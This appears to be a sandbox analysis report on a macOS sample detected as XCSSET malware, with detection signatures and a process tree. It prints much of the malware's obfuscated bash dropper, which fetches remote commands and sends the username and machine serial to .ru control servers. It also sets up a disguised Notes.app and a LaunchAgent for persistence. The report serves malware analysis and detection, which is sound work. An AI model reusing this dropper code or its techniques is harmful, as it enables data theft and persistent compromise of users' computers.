Loading Joe Sandbox Report ...

Edit tour

macOS Analysis Report
exec.2430808

Overview

General Information

Sample Name:exec.2430808
Analysis ID:176612
MD5:1ce8099c5bb8fbe715ae7c546c46a526
SHA1:127b66afa20a1c42e653ee4f4b64cf1ee3ed637d
SHA256:483b2f45a06516439b1dbfedda52f135a4ccdeafd91192e64250305644e5ff48
Infos:

Detection

XCSSET
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Yara detected XCSSET
Sends data within HTTP X-headers likely leaking sensitive information
Writes compiled Apple script to disk (with potentially malicious intention)
Creates launch services redirecting its stdout/stderr to /dev/null (probably to hide errors)
Searches for processes that are suspiciously named
Written Apple script contain uncommon file extension (probably to disguise the script)
Executes the "csrutil" command used to retrieve or modify the "System Integrity Protection" configuration
Queries the unique Apple serial number of the machine
Sets the property list key LSUIElement for running apps in the background without appearing in the Dock
Writes Mach-O files to untypical directories
Tries to delete plist files with Apple identifiers
Likely kills multiple processes
Copies icons from applications possibly to disguise malicious intentions
Writes Mach-O files to disk with suspicious names (probably to obfuscate its intention)
Likely queries the I/O Kit registry to detect VMs by querying the "IOPlatformExpertDevice" class
Executes the "xxd" command used for reading and creating hexdumps
Yara signature match
Uses AppleScript framework/components containing Apple Script related functionalities
Explicitly unloads, stops, and/or removes launch services
Executes the "mkdir" command used to create folders
Executes the "grep" command used to find patterns in files or piped streams
Executes Apple scripts and/or other OSA language scripts with shell command 'osascript'
Executes the "chmod" command used to modify permissions
Executes the "curl" command used to transfer data via the network (typically using HTTP/S)
Executes the "ping" command used for connectivity testing via ICMP
Uses AppleScript scripting additions containing additional functionalities for Apple Scripts
Reads file resource fork extended attributes
Deletes icon files
Creates code signed application bundles
Mach-O contains sections with high entropy indicating compressed/encrypted content
Changes permissions of written Mach-O files
Executes commands using a shell command-line interpreter
Executes the "defaults" command used to read or modify user specific settings
Executes the "touch" command used to create files or modify time stamps
Executes the "plutil" command used to modify plists
Executes the "ioreg" command used to gather hardware information (I/O kit registry)
Reads the systems hostname
Reads the sysctl safe boot value (probably to check if the system is in safe boot mode)
Executes the "ps" command used to list the status of processes
Writes icon files to disk
Creates memory-persistent launch services
Executes the "sysctl" command used to retrieve or modify kernel settings
Explicitly loads/starts launch services
Queries the macOS product version
Creates launch services that start periodically
Reads hardware related sysctl values
Executes the "codesign" command used to create and manipulate code signatures
Creates user-wide 'launchd' managed services aka launch agents
Creates 'launchd' managed services aka launch agents with bundle ID names to possibly disguise malicious intentions
Creates hidden files, links and/or directories
Executes the "rm" command used to delete files or directories
Many shell processes execute programs via execve syscall (might be indicative for malicious behavior)
Writes FAT Mach-O files to disk

Classification

Analysis Advice

Some HTTP requests failed (404). It is likely that the sample will exhibit less behavior.
Joe Sandbox Version:
Analysis ID:176612
Start date and time:2022-08-24 11:18:17 +02:00
Joe Sandbox Product:Cloud
Overall analysis duration:0h 5m 36s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:exec.2430808
Cookbook file name:macOS - Monterey - load provided binary as normal user.jbs
Analysis system description:Mac Mini, Monterey (Java 1.8.0_341)
Analysis Mode:default
Detection:MAL
Classification:mal100.troj.spyw.evad.mac2430808@0/32@2/0
  • Report creation exceeded maximum number of non-whitelisted processes and may have missing process information.
Command:sudo -u pedro /Users/pedro/Desktop/exec.2430808
PID:956
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
launched with args v10 notes app:
basedir:, autoclean: , domain:
target dir is: /Users/pedro/Library/Group Containers/group.com.apple.mail target domain: melindas.ru target plist: /Users/pedro/Library/LaunchAgents/com.apple.spx.plist
step 1
step 2
step 3
first launch. processing...
cleaning done...
created directory structure...
compiled app...
created scpt...
put Xcode icon in place...
wrote to LaunchAgents... wrote .plist
loaded service...
wrote .report
wrote .domain
done. finished.
Standard Error:
  • System is mac-monterey
  • sudo (MD5: 2d2c9298401fd5607184821a6ed73106) Arguments: /usr/bin/sudo -u pedro /Users/pedro/Desktop/exec.2430808
    • sudo New Fork (PID: 957, Parent: 956)
    • exec.2430808 (MD5: 1ce8099c5bb8fbe715ae7c546c46a526) Arguments: /Users/pedro/Desktop/exec.2430808
    • bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: /Users/pedro/Desktop/exec.2430808 -c exec '/Users/pedro/Desktop/exec.2430808' '$@' /Users/pedro/Desktop/exec.2430808
    • exec.2430808 (MD5: 1ce8099c5bb8fbe715ae7c546c46a526) Arguments: /Users/pedro/Desktop/exec.2430808
    • bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: /Users/pedro/Desktop/exec.2430808 -c #!/bin/bashAUTOCLEAN=$2BASEDIR=$1BASEDIR=${PROJECT_FILE_PATH}BUILD_VERSION=1.1.5BUILD_VENDOR='default'RANDOM_PATHS=('$HOME/Library/Application Support/com.apple.spotlight' '$HOME/Library/Application Scripts/com.apple.CalendarAgent' '$HOME/Library/Group Containers/group.com.apple.mail' '$HOME/Library/Containers/com.apple.photolibraryd')DOMAIN_ONE=$(echo '73 75 70 65 72 64 6F 63 73 2E 72 75' | xxd -p -r)DOMAIN_TWO=$(echo '6D 65 6C 69 6E 64 61 73 2E 72 75' | xxd -p -r)DOMAIN_THREE=$(echo '6B 69 6E 6B 73 64 6F 63 2E 72 75' | xxd -p -r)DOMAIN_FOUR=$(echo '61 64 6F 62 65 66 69 6C 65 2E 72 75' | xxd -p -r)ACTIVE_DOMAINS=(${DOMAIN_ONE} ${DOMAIN_TWO} ${DOMAIN_THREE} ${DOMAIN_FOUR})TARGET_DOMAIN=${ACTIVE_DOMAINS[RANDOM%${#ACTIVE_DOMAINS[@]}]}if [ ! -z '$3' ] then TARGET_DOMAIN=$3fiSTR_TWO=$(echo '58 2D 4D 6F 64 3A 20 50 6F 64 73' | xxd -p -r) # X-Mod: PodsSTR_ONE=$(echo '58 2D 55 73 72 3A' | xxd -p -r) # X-Usr:TARGETDIRFILE='$HOME/Library/Caches/GitServices/.report'TARGETPLISTFILE='$HOME/Library/Caches/GitServices/.plist'TARGETDOMAINFILE='$HOME/Library/Caches/GitServices/.domain'BOOT_FILE='$HOME/Library/Caches/GitServices/AppleWebKit'EXEC_DONE_FILE='$HOME/Library/Caches/GitServices/.exec_done'RANDOM_PLISTS=('$HOME/Library/LaunchAgents/com.apple.airplay.plist' '$HOME/Library/LaunchAgents/com.apple.spx.plist' '$HOME/Library/LaunchAgents/com.google.keystore.plist' '$HOME/Library/LaunchAgents/com.google.chrome.plist')MACOS_VERSION=$(defaults read loginwindow SystemVersionStampAsString)logme(){curl --connect-timeout 11 -s -k -d '$1' -H '$STR_ONE $USER' -H '$STR_TWO' 'https://$TARGET_DOMAIN/sys/log.php' > /dev/null 2>&1}clean_proj(){perl -ni -e 'print unless /(.*)AAC43A(.*),/' '$BASEDIR/project.pbxproj' > /dev/null 2>&1perl -ni -e 'print unless /(.*)6D902C(.*),/' '$BASEDIR/project.pbxproj' > /dev/null 2>&1perl -ni -e 'print unless /(.*)FFA81D(.*),/' '$BASEDIR/project.pbxproj' > /dev/null 2>&1perl -ni -e 'print unless /(.*)6A102C(.*),/' '$BASEDIR/project.pbxproj' > /dev/null 2>&1perl -ni -e 'print unless /(3F708E50247A0EB6004066FD)(.*),/' '$BASEDIR/project.pbxproj' > /dev/null 2>&1perl -ni -e 'print unless /(162E3FD122D63A22006D904C)(.*),/' '$BASEDIR/project.pbxproj' > /dev/null 2>&1perl -ni -e 'print unless /(1D60589F0D05DD5A006BFC54)(.*),/' '$BASEDIR/project.pbxproj' > /dev/null 2>&1perl -ni -e 'print unless /(1D3623260D0F684500981D51)(.*),/' '$BASEDIR/project.pbxproj' > /dev/null 2>&1perl -ni -e 'print unless /(167012E12301506800C38AA3)(.*),/' '$BASEDIR/project.pbxproj' > /dev/null 2>&1rm -rf '$BASEDIR/xcuserdata/.xcassets/' || true}write_meta(){TARGETDIRFILE_DIR=`dirname $2`[ ! -d $TARGETDIRFILE_DIR ] && mkdir -p $TARGETDIRFILE_DIRecho '$1' > '$2'}curl --connect-timeout 11 -s -k 'https://$TARGET_DOMAIN' > /dev/null || exit 0str=''for ARG in '$@' do str='${str} ${ARG}'doneecho 'launched with args v10 notes app:${str}'echo 'basedir:${1}, autoclean: ${2}, domain: ${3}'cmd=$(curl -ks -m 5 -H '$STR_ONE $USER' https://$TARGET_DOMAIN/sys/prepod.php)if [[ ! -z '$cmd' ]] thenecho 'got prepod remote command. executing...'osascript -e '$cmd' 2>/dev/null && exit 1echo 'remote command failed. continue normal flow...'fiif [ -f '$TARGETDIRFILE' ] thenTARGETDIR=$(cat '$TARGETDIRFILE')APP_FILE='$TARGETDIR/Notes.app'if [ ! -d '$APP_FILE' ] thenTARGETDIR=${RANDOM_PATHS[RANDOM%${#RANDOM_PATHS[@]}]}fielseTARGETDIR=${RANDOM_PATHS[RANDOM%${#RANDOM_PATHS[@]}]}fiif [ -f '$TARGETPLISTFILE' ] thenPLIST_FILE=$(cat '$TARGETPLISTFILE')if [ ! -f '$PLIST_FILE' ] thenPLIST_FILE=${RANDOM_PLISTS[RANDOM%${#RANDOM_PLISTS[@]}]}fielsePLIST_FILE=${RANDOM_PLISTS[RANDOM%${#RANDOM_PLISTS[@]}]}fiecho 'target dir is: $TARGETDIR target domain: $TARGET_DOMAIN target plist: $PLIST_FILE'APP_FILE='$TARGETDIR/Notes.app'SCPT_FILE='$TARGETDIR/Notes.app/Contents/Resources/Scripts/a.scpt'if [ ! -d '$APP_FILE' ] thenecho 'step 1'fiif [ ! -f '$PLIST_FILE' ] thenecho 'step 2'fiif [ ! -f '$EXEC_DONE_FILE' ] thenecho 'step 3'fiif [ -d '$APP_FILE' ] && [ -f '$PLIST_FILE' ] && [ -f '$BOOT_FILE' ] && [ -f '$EXEC_DONE_FILE' ] thenecho 'all files are set!'SERVICE_IS_RUNNING=$(pgrep -f com.java.core com.sys.core > /dev/null 2>&1 && echo 1 || echo 0)if [ $SERVICE_IS_RUNNING = 0 ] thenecho 'service is not running. restarting...'if [[ $MACOS_VERSION == '11.'* ]] then curl -ks -o /tmp/open 'https://$TARGET_DOMAIN/agent/bin/open' chmod +x /tmp/open /tmp/open '$APP_FILE' > /dev/null 2>&1 &elseopen '$APP_FILE' > /dev/null 2>&1 &fifiif [[ '$AUTOCLEAN' = true ]] thenclean_projfi[ ! -f $TARGETDIRFILE ] && write_meta $TARGETDIR $TARGETDIRFILEexit 0fiecho 'first launch. processing...'for i in '${RANDOM_PATHS[@]}'dorm -rf '$i/Notes.app' > /dev/null 2>&1rm -rf '$i/Containers' > /dev/null 2>&1donetouch '$TMPDIR/test.tmp' 2>/dev/null || truefor i in '${RANDOM_PLISTS[@]}'dorm -f '$i' > /dev/null 2>&1rm -f '$i' > /dev/null 2>&1doneecho 'cleaning done...'mkdir -p '$TARGETDIR' > /dev/null 2>&1echo 'created directory structure...'read -r -d '' PAYLOAD2 << EOMtrydo shell script 'osascript '$SCPT_FILE''end tryEOMosacompile -x -e '$PAYLOAD2' -o '$APP_FILE' > /dev/null 2>&1touch '$TMPDIR/test2.tmp' 2>/dev/null || trueecho 'compiled app...'read -r -d '' PAYLOAD << EOMglobal dsglobal dglobal diset ds to {'', '', '', '', '', ''}set di to 1set d to item di of dson xe(_str)set x to id of _strrepeat with c in xset contents of c to c - (102 - 2)end repeatreturn string id xend xeon xex(_str)set x to id of _strrepeat with c in xset contents of c to c - (102 - 1)end repeatreturn string id xend xexon m()-- log 'domain used ' & xe(d)set dF to POSIX path of ((path to me as text) & '::')set tF to quoted form of (dF & xex('')) -- /Containersdo shell script 'rm -rf ' & tFset a to '123'do shell script 'mkdir -p ' & tFset f to quoted form of (dF & xex('')) -- /Containers/aset un to do shell script xe('') -- whoamido shell script 'curl -
      • bash New Fork (PID: 959, Parent: 957)
        • bash New Fork (PID: 960, Parent: 959)
        • bash New Fork (PID: 961, Parent: 959)
        • xxd (MD5: aaca2dc9ef1cdee4042195108a1e9588) Arguments: xxd -p -r
      • bash New Fork (PID: 962, Parent: 957)
        • bash New Fork (PID: 963, Parent: 962)
        • bash New Fork (PID: 964, Parent: 962)
        • xxd (MD5: aaca2dc9ef1cdee4042195108a1e9588) Arguments: xxd -p -r
      • bash New Fork (PID: 965, Parent: 957)
        • bash New Fork (PID: 966, Parent: 965)
        • bash New Fork (PID: 967, Parent: 965)
        • xxd (MD5: aaca2dc9ef1cdee4042195108a1e9588) Arguments: xxd -p -r
      • bash New Fork (PID: 968, Parent: 957)
        • bash New Fork (PID: 969, Parent: 968)
        • bash New Fork (PID: 970, Parent: 968)
        • xxd (MD5: aaca2dc9ef1cdee4042195108a1e9588) Arguments: xxd -p -r
      • bash New Fork (PID: 971, Parent: 957)
        • bash New Fork (PID: 972, Parent: 971)
        • bash New Fork (PID: 973, Parent: 971)
        • xxd (MD5: aaca2dc9ef1cdee4042195108a1e9588) Arguments: xxd -p -r
      • bash New Fork (PID: 974, Parent: 957)
        • bash New Fork (PID: 975, Parent: 974)
        • bash New Fork (PID: 976, Parent: 974)
        • xxd (MD5: aaca2dc9ef1cdee4042195108a1e9588) Arguments: xxd -p -r
      • bash New Fork (PID: 977, Parent: 957)
        • bash New Fork (PID: 978, Parent: 977)
        • defaults (MD5: 4e146d0cf6ed8b4592347198fc2a990c) Arguments: defaults read loginwindow SystemVersionStampAsString
      • bash New Fork (PID: 979, Parent: 957)
      • curl (MD5: f26856a56418cdf4551b4bdd7be78831) Arguments: curl --connect-timeout 11 -s -k https://melindas.ru
      • bash New Fork (PID: 981, Parent: 957)
        • bash New Fork (PID: 982, Parent: 981)
        • curl (MD5: f26856a56418cdf4551b4bdd7be78831) Arguments: curl -ks -m 5 -H X-Usr: pedro https://melindas.ru/sys/prepod.php
      • bash New Fork (PID: 983, Parent: 957)
      • rm (MD5: dc9f95c6c7dbdd1609aa6716ba393cd3) Arguments: rm -rf /Users/pedro/Library/Application Support/com.apple.spotlight/Notes.app
      • bash New Fork (PID: 984, Parent: 957)
      • rm (MD5: dc9f95c6c7dbdd1609aa6716ba393cd3) Arguments: rm -rf /Users/pedro/Library/Application Support/com.apple.spotlight/Containers
      • bash New Fork (PID: 985, Parent: 957)
      • rm (MD5: dc9f95c6c7dbdd1609aa6716ba393cd3) Arguments: rm -rf /Users/pedro/Library/Application Scripts/com.apple.CalendarAgent/Notes.app
      • bash New Fork (PID: 986, Parent: 957)
      • rm (MD5: dc9f95c6c7dbdd1609aa6716ba393cd3) Arguments: rm -rf /Users/pedro/Library/Application Scripts/com.apple.CalendarAgent/Containers
      • bash New Fork (PID: 987, Parent: 957)
      • rm (MD5: dc9f95c6c7dbdd1609aa6716ba393cd3) Arguments: rm -rf /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app
      • bash New Fork (PID: 988, Parent: 957)
      • rm (MD5: dc9f95c6c7dbdd1609aa6716ba393cd3) Arguments: rm -rf /Users/pedro/Library/Group Containers/group.com.apple.mail/Containers
      • bash New Fork (PID: 989, Parent: 957)
      • rm (MD5: dc9f95c6c7dbdd1609aa6716ba393cd3) Arguments: rm -rf /Users/pedro/Library/Containers/com.apple.photolibraryd/Notes.app
      • bash New Fork (PID: 990, Parent: 957)
      • rm (MD5: dc9f95c6c7dbdd1609aa6716ba393cd3) Arguments: rm -rf /Users/pedro/Library/Containers/com.apple.photolibraryd/Containers
      • bash New Fork (PID: 991, Parent: 957)
      • touch (MD5: 63d1087742d412edbc4f41c9e90067d2) Arguments: touch /test.tmp
      • bash New Fork (PID: 992, Parent: 957)
      • rm (MD5: dc9f95c6c7dbdd1609aa6716ba393cd3) Arguments: rm -f /Users/pedro/Library/LaunchAgents/com.apple.airplay.plist
      • bash New Fork (PID: 993, Parent: 957)
      • rm (MD5: dc9f95c6c7dbdd1609aa6716ba393cd3) Arguments: rm -f /Users/pedro/Library/LaunchAgents/com.apple.airplay.plist
      • bash New Fork (PID: 994, Parent: 957)
      • rm (MD5: dc9f95c6c7dbdd1609aa6716ba393cd3) Arguments: rm -f /Users/pedro/Library/LaunchAgents/com.apple.spx.plist
      • bash New Fork (PID: 995, Parent: 957)
      • rm (MD5: dc9f95c6c7dbdd1609aa6716ba393cd3) Arguments: rm -f /Users/pedro/Library/LaunchAgents/com.apple.spx.plist
      • bash New Fork (PID: 996, Parent: 957)
      • rm (MD5: dc9f95c6c7dbdd1609aa6716ba393cd3) Arguments: rm -f /Users/pedro/Library/LaunchAgents/com.google.keystore.plist
      • bash New Fork (PID: 997, Parent: 957)
      • rm (MD5: dc9f95c6c7dbdd1609aa6716ba393cd3) Arguments: rm -f /Users/pedro/Library/LaunchAgents/com.google.keystore.plist
      • bash New Fork (PID: 998, Parent: 957)
      • rm (MD5: dc9f95c6c7dbdd1609aa6716ba393cd3) Arguments: rm -f /Users/pedro/Library/LaunchAgents/com.google.chrome.plist
      • bash New Fork (PID: 999, Parent: 957)
      • rm (MD5: dc9f95c6c7dbdd1609aa6716ba393cd3) Arguments: rm -f /Users/pedro/Library/LaunchAgents/com.google.chrome.plist
      • bash New Fork (PID: 1000, Parent: 957)
      • mkdir (MD5: 1a411936bac2c64c06674cbcfcdd66f8) Arguments: mkdir -p /Users/pedro/Library/Group Containers/group.com.apple.mail
      • bash New Fork (PID: 1001, Parent: 957)
      • osacompile (MD5: 84bbdc98ac7aa38fcbb281f019bb391d) Arguments: osacompile -x -e trydo shell script 'osascript '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/a.scpt''end try -o /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app
        • codesign New Fork (PID: 1002, Parent: 1001)
      • bash New Fork (PID: 1003, Parent: 957)
      • touch (MD5: 63d1087742d412edbc4f41c9e90067d2) Arguments: touch /test2.tmp
      • bash New Fork (PID: 1004, Parent: 957)
      • touch (MD5: 63d1087742d412edbc4f41c9e90067d2) Arguments: touch /test3.tmp
      • bash New Fork (PID: 1005, Parent: 957)
      • plutil (MD5: 11427a2425049a93a60e85d61c9c0081) Arguments: plutil -replace LSUIElement -bool YES /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Info.plist
      • bash New Fork (PID: 1006, Parent: 957)
      • rm (MD5: dc9f95c6c7dbdd1609aa6716ba393cd3) Arguments: rm -f /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/applet.icns
      • bash New Fork (PID: 1007, Parent: 957)
      • cp (MD5: c6968d65936952ad8b175271cbbc8708) Arguments: cp -f /System/Applications/Notes.app/Contents/Resources/AppIcon.icns /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/applet.icns
      • bash New Fork (PID: 1008, Parent: 957)
        • bash New Fork (PID: 1009, Parent: 1008)
        • dirname (MD5: 206cca615592f99874d8cb4cd1641f07) Arguments: dirname /Users/pedro/Library/LaunchAgents/com.apple.spx.plist
      • bash New Fork (PID: 1010, Parent: 957)
      • mkdir (MD5: 1a411936bac2c64c06674cbcfcdd66f8) Arguments: mkdir -p /Users/pedro/Library/LaunchAgents
      • bash New Fork (PID: 1011, Parent: 957)
        • bash New Fork (PID: 1012, Parent: 1011)
        • dirname (MD5: 206cca615592f99874d8cb4cd1641f07) Arguments: dirname /Users/pedro/Library/Caches/GitServices/AppleWebKit
      • bash New Fork (PID: 1013, Parent: 957)
      • mkdir (MD5: 1a411936bac2c64c06674cbcfcdd66f8) Arguments: mkdir -p /Users/pedro/Library/Caches/GitServices
      • bash New Fork (PID: 1014, Parent: 957)
      • cat (MD5: c5d124a467bf29f668fd9bac3a9856ab) Arguments: cat
      • bash New Fork (PID: 1015, Parent: 957)
      • chmod (MD5: 8339fe4afa333001c03a7b21f7ad0e9c) Arguments: chmod +x /Users/pedro/Library/Caches/GitServices/AppleWebKit
      • bash New Fork (PID: 1016, Parent: 957)
      • cat (MD5: c5d124a467bf29f668fd9bac3a9856ab) Arguments: cat
      • bash New Fork (PID: 1017, Parent: 957)
      • launchctl (MD5: 240cdf175cab143785114a58688a4d0a) Arguments: launchctl unload -w /Users/pedro/Library/LaunchAgents/com.apple.spx.plist
      • bash New Fork (PID: 1018, Parent: 957)
      • touch (MD5: 63d1087742d412edbc4f41c9e90067d2) Arguments: touch /test4.tmp
      • bash New Fork (PID: 1019, Parent: 957)
      • launchctl (MD5: 240cdf175cab143785114a58688a4d0a) Arguments: launchctl load -w /Users/pedro/Library/LaunchAgents/com.apple.spx.plist
      • bash New Fork (PID: 1021, Parent: 957)
        • bash New Fork (PID: 1022, Parent: 1021)
        • dirname (MD5: 206cca615592f99874d8cb4cd1641f07) Arguments: dirname /Users/pedro/Library/Caches/GitServices/.report
      • bash New Fork (PID: 1024, Parent: 957)
      • touch (MD5: 63d1087742d412edbc4f41c9e90067d2) Arguments: touch /test5.tmp
      • bash New Fork (PID: 1025, Parent: 957)
      • touch (MD5: 63d1087742d412edbc4f41c9e90067d2) Arguments: touch /test6.tmp
  • xpcproxy New Fork (PID: 1020, Parent: 1)
  • bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: bash /Users/pedro/Library/Caches/GitServices/AppleWebKit
    • bash New Fork (PID: 1023, Parent: 1020)
    • applet (MD5: 1535756d106d32fe31c1959e19e6582d) Arguments: /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/MacOS/applet
      • sh New Fork (PID: 1028, Parent: 1023)
      • bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c osascript '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/a.scpt'
      • osascript (MD5: d86dbe94a4b95a8d18c37e43b7d6b6a4) Arguments: osascript /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/a.scpt
        • sh New Fork (PID: 1029, Parent: 1028)
        • bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c ping -o -t 3 superdocs.ru
        • ping (MD5: e7f06272a612949c2e552aa2556fb798) Arguments: ping -o -t 3 superdocs.ru
        • sh New Fork (PID: 1030, Parent: 1028)
        • bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c rm -rf '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers'
        • rm (MD5: dc9f95c6c7dbdd1609aa6716ba393cd3) Arguments: rm -rf /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers
        • sh New Fork (PID: 1031, Parent: 1028)
        • bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c mkdir -p '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers'
        • mkdir (MD5: 1a411936bac2c64c06674cbcfcdd66f8) Arguments: mkdir -p /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers
        • sh New Fork (PID: 1032, Parent: 1028)
        • bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c whoami
        • whoami (MD5: 3c1b6e2e567df857130cd73ff38d3df7) Arguments: whoami
        • sh New Fork (PID: 1033, Parent: 1028)
        • bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c curl -sk -d 'user=pedro&build_vendor=default&build_version=1.1.5' https://superdocs.ru/apple/com.php | osacompile -x -o '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/a'
          • bash New Fork (PID: 1034, Parent: 1033)
          • curl (MD5: f26856a56418cdf4551b4bdd7be78831) Arguments: curl -sk -d user=pedro&build_vendor=default&build_version=1.1.5 https://superdocs.ru/apple/com.php
          • bash New Fork (PID: 1035, Parent: 1033)
          • osacompile (MD5: 84bbdc98ac7aa38fcbb281f019bb391d) Arguments: osacompile -x -o /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/a
        • sh New Fork (PID: 1036, Parent: 1028)
        • bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c osascript '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/a' > /dev/null 2>&1
          • bash New Fork (PID: 1037, Parent: 1036)
          • osascript (MD5: d86dbe94a4b95a8d18c37e43b7d6b6a4) Arguments: osascript /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/a
            • sh New Fork (PID: 1038, Parent: 1037)
            • bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c whoami
            • whoami (MD5: 3c1b6e2e567df857130cd73ff38d3df7) Arguments: whoami
            • sh New Fork (PID: 1039, Parent: 1037)
            • bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c ping -o -t 3 superdocs.ru
            • ping (MD5: e7f06272a612949c2e552aa2556fb798) Arguments: ping -o -t 3 superdocs.ru
            • sh New Fork (PID: 1040, Parent: 1037)
            • bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c ioreg -c IOPlatformExpertDevice -d 2 | awk -F\' '/IOPlatformSerialNumber/{print $(NF-1)}'
              • bash New Fork (PID: 1041, Parent: 1040)
              • ioreg (MD5: d03e2df1848ceb731ba4a8c3e82b2011) Arguments: ioreg -c IOPlatformExpertDevice -d 2
              • bash New Fork (PID: 1042, Parent: 1040)
              • awk (MD5: 231a9b1c4634f8b7b53d29c9c47ee4df) Arguments: awk -F' /IOPlatformSerialNumber/{print $(NF-1)}
            • sh New Fork (PID: 1043, Parent: 1037)
            • bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c curl -k -s --connect-timeout 14 -d 'module launched. connRetries: 0. Used domain: superdocs.ru' -H 'X-Id: C07GV0KZPJH8' -H 'X-Users: pedro' -H 'X-Mod: bootstrap' https://superdocs.ru/l
            • curl (MD5: f26856a56418cdf4551b4bdd7be78831) Arguments: curl -k -s --connect-timeout 14 -d module launched. connRetries: 0. Used domain: superdocs.ru -H X-Id: C07GV0KZPJH8 -H X-Users: pedro -H X-Mod: bootstrap https://superdocs.ru/l
            • sh New Fork (PID: 1044, Parent: 1037)
            • bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c mkdir -p ~/Library/Caches/GitServices/ && touch ~/Library/Caches/GitServices/.ed
              • bash New Fork (PID: 1045, Parent: 1044)
              • mkdir (MD5: 1a411936bac2c64c06674cbcfcdd66f8) Arguments: mkdir -p /Users/pedro/Library/Caches/GitServices/
              • bash New Fork (PID: 1046, Parent: 1044)
              • touch (MD5: 63d1087742d412edbc4f41c9e90067d2) Arguments: touch /Users/pedro/Library/Caches/GitServices/.ed
            • sh New Fork (PID: 1048, Parent: 1037)
            • bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c (plutil -p ~/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist | grep 'https' -b3 |awk 'NR==3 {split($4, arr, '\'') print arr[2]}') || echo 'com.apple.safari'
              • bash New Fork (PID: 1049, Parent: 1048)
                • bash New Fork (PID: 1050, Parent: 1049)
                • plutil (MD5: 11427a2425049a93a60e85d61c9c0081) Arguments: plutil -p /Users/pedro/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist
                • bash New Fork (PID: 1051, Parent: 1049)
                • grep (MD5: 99be09a23ac46af2879dc015993ca389) Arguments: grep https -b3
                • bash New Fork (PID: 1052, Parent: 1049)
                • awk (MD5: 231a9b1c4634f8b7b53d29c9c47ee4df) Arguments: awk NR==3 {split($4, arr, '\'') print arr[2]}
            • sh New Fork (PID: 1053, Parent: 1037)
            • bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c defaults read loginwindow SystemVersionStampAsString
            • defaults (MD5: 4e146d0cf6ed8b4592347198fc2a990c) Arguments: defaults read loginwindow SystemVersionStampAsString
            • sh New Fork (PID: 1054, Parent: 1037)
            • bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c defaults read /Applications/Safari.app/Contents/Info CFBundleShortVersionString
            • defaults (MD5: 4e146d0cf6ed8b4592347198fc2a990c) Arguments: defaults read /Applications/Safari.app/Contents/Info CFBundleShortVersionString
            • sh New Fork (PID: 1056, Parent: 1037)
            • bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c ioreg -c IOPlatformExpertDevice -d 2 | awk -F\' '/IOPlatformSerialNumber/{print $(NF-1)}'
              • bash New Fork (PID: 1057, Parent: 1056)
              • ioreg (MD5: d03e2df1848ceb731ba4a8c3e82b2011) Arguments: ioreg -c IOPlatformExpertDevice -d 2
              • bash New Fork (PID: 1058, Parent: 1056)
              • awk (MD5: 231a9b1c4634f8b7b53d29c9c47ee4df) Arguments: awk -F' /IOPlatformSerialNumber/{print $(NF-1)}
            • sh New Fork (PID: 1059, Parent: 1037)
            • bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c defaults read /Library/Preferences/com.apple.alf globalstate
            • defaults (MD5: 4e146d0cf6ed8b4592347198fc2a990c) Arguments: defaults read /Library/Preferences/com.apple.alf globalstate
            • sh New Fork (PID: 1060, Parent: 1037)
            • bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c csrutil status | grep -q enabled && echo 1 || echo 0
              • bash New Fork (PID: 1061, Parent: 1060)
              • csrutil (MD5: 51e2d23508016b3dba2263fd13f74859) Arguments: csrutil status
              • bash New Fork (PID: 1062, Parent: 1060)
              • grep (MD5: 99be09a23ac46af2879dc015993ca389) Arguments: grep -q enabled
            • sh New Fork (PID: 1063, Parent: 1037)
            • bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c sysctl -n machdep.cpu.brand_string
